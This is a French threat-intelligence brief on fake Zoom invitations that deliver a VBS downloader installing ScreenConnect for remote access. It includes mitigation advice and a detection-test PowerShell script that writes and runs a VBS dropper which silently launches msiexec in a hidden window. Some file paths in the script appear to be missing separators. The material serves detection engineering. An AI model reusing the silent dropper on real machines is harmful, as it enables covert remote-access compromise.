SOC Prime Bias: Élevé

19 May 2026 13:30 UTC

Cliquez, Installez, Compromis : La Nouvelle Vague d’Attaques Thématisées sur Zoom

Author Photo
SOC Prime Team linkedin icon Suivre
Cliquez, Installez, Compromis : La Nouvelle Vague d’Attaques Thématisées sur Zoom
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Résumé

Les acteurs de menace exploitent de fausses invitations à des réunions Zoom pour livrer un téléchargeur VBS malveillant qui installe ConnectWise ScreenConnect, une application d’accès à distance légitime. La charge utile VBS télécharge le MSI de ScreenConnect à partir d’une infrastructure contrôlée par les attaquants et le lance depuis le répertoire de la TEMP victime. Après l’installation de l’outil d’accès à distance, les attaquants obtiennent un accès persistant au système, permettant le vol de données d’identification, la reconnaissance et la livraison de logiciels malveillants supplémentaires, tels que les rançongiciels.

Enquête

Cofense a identifié des e-mails de phishing dirigeant les victimes vers une fausse page Zoom les incitant à installer une fausse mise à jour. Cette mise à jour livrait un fichier VBS nommé _zoommeeting_Zoom_Installer_64_bit.exe.vbs, qui contenait une URL codée en dur pointant vers une adresse IP malveillante hébergeant l’installateur ScreenConnect.ClientSetup.msi . Le script exécutait ensuite le MSI via Windows Script Host dans une fenêtre cachée pour éviter d’attirer l’attention.

Atténuation

Les organisations devraient déployer des contrôles de sécurité des e-mails capables de détecter et de bloquer les tentatives de phishing à thème Zoom, exiger l’authentification multifactorielle pour les outils d’accès à distance et restreindre l’exécution de scripts VBS à partir de répertoires modifiables par les utilisateurs. Les défenseurs doivent également surveiller le trafic réseau pour détecter la communication avec des domaines et IP malveillants connus et appliquer la liste blanche des applications pour contrôler les logiciels légitimes d’administration à distance.

Réponse

Si cette activité est détectée, isolez immédiatement le poste de travail affecté, supprimez le fichier VBS malveillant et tous les composants ScreenConnect installés, et réinitialisez les identifiants compromis. Les enquêteurs doivent ensuite effectuer une analyse forensique pour déterminer si des logiciels malveillants supplémentaires ont été déployés ou si des données ont été exfiltrées. Les politiques d’accès à distance doivent également être révisées et renforcées, et le contenu de détection doit être mis à jour avec les indicateurs de compromission observés.

Flux d’Attaque

Exécution de Simulation

Prérequis : La vérification prévol Télémetrie & Baseline doit avoir passé.

Justification : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTPs identifiés et viser à générer la télémetrie exacte attendue par la logique de détection.

Récit et Commandes d’Attaque

  1. Livraison Initiale : La victime reçoit un e-mail de phishing intitulé « Zoom Meeting – Install Update ». La pièce jointe est un script VBS nommé _zoommeeting_Zoom_installer_64_bit.exe.vbs.
  2. Exécution : L’utilisateur double-clique sur le fichier VBS, qui invoque cscript.exe pour exécuter le script. Le script dépose deux charges utiles dans %TEMP%:
    • ScreenConnect.ClientSetup.msi – le programme d’installation de l’outil d’accès à distance malveillant.
    • Une porte dérobée PowerShell secondaire (ne faisant pas partie de cette règle).
  3. Installation : Le script VBS lance discrètement msiexec.exe pour installer le ScreenConnect.ClientSetup.msi avec /quiet. Cela crée un nouvel événement de création de processus dont l’ Image finit par ScreenConnect.ClientSetup.msi, satisfaisant la condition de la règle.

Script de Test de Régression

# --------------------------------------------------------------
#  Script de Simulation – Déclenche "ScreenConnect.ClientSetup.msi"
#  et "_zoommeeting_Zoom_installer_64_bit.exe.vbs" détections
# --------------------------------------------------------------

# 1. Préparer les charges utiles (dans un test réel, ce seraient les fichiers malveillants)
$payloadDir = "$env:TEMPZoomPhish"
New-Item -Path $payloadDir -ItemType Directory -Force | Out-Null

# Fichiers factices pour émuler les noms malveillants (les hachages peuvent être ajoutés plus tard)
$msiPath   = Join-Path $payloadDir "ScreenConnect.ClientSetup.msi"
$vbscript  = Join-Path $payloadDir "_zoommeeting_Zoom_installer_64_bit.exe.vbs"

# Créer des fichiers vides de remplacement (à remplacer par de vraies charges utiles pour le test en direct)
New-Item -Path $msiPath -ItemType File -Force | Out-Null
Set-Content -Path $vbscript -Value @"
' VBS dropper – écrit le MSI sur disque et le lance
Set objFSO = CreateObject("Scripting.FileSystemObject")
strTemp = objFSO.GetSpecialFolder(2) ' %TEMP%
objFSO.CopyFile "%~dp0ScreenConnect.ClientSetup.msi", strTemp & "ScreenConnect.ClientSetup.msi"
Set objShell = CreateObject("WScript.Shell")
objShell.Run "msiexec /i """ & strTemp & "ScreenConnect.ClientSetup.msi"" /quiet", 0, False
"@ -Encoding ASCII

# 2. Exécuter le dropper VBS (cela va à son tour lancer msiexec)
cscript.exe //B //Nologo $vbscript

Write-Host "`n[+] Simulation exécutée – la détection devrait se déclencher maintenant." -ForegroundColor Green

Commandes de Nettoyage

# --------------------------------------------------------------
#  Nettoyage – supprime les artefacts créés par la simulation
# --------------------------------------------------------------

$payloadDir = "$env:TEMPZoomPhish"

# Arrêter les processus msiexec persistants démarrés par le test
Get-Process -Name msiexec -ErrorAction SilentlyContinue | Stop-Process -Force

# Supprimer les fichiers temporaires et le répertoire
Remove-Item -Path $payloadDir -Recurse -Force -ErrorAction SilentlyContinue

Write-Host "`n[+] Nettoyage terminé." -ForegroundColor Yellow